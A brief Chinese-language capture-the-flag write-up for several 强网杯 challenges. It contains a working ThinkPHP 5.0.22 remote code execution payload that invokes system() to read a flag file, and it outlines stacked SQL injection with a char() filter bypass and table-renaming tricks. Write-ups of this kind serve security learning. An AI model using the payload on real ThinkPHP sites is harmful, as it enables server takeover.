0x01前言

强网杯部分wp

0x02正文

强网先锋上单

thinkphp5.0.22漏洞

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag

高明的黑客

动态参数测试,disable_functions限制systemasserteval

脚本:

随便注

堆叠注入,char绕过

还可以利用alter,rename改表名,列名让默认查询的回显换表,从而打出flag

https://www.zhaoj.in/read-5873.html

0x03总结

upload那题没想到可以利用__get触发upload_img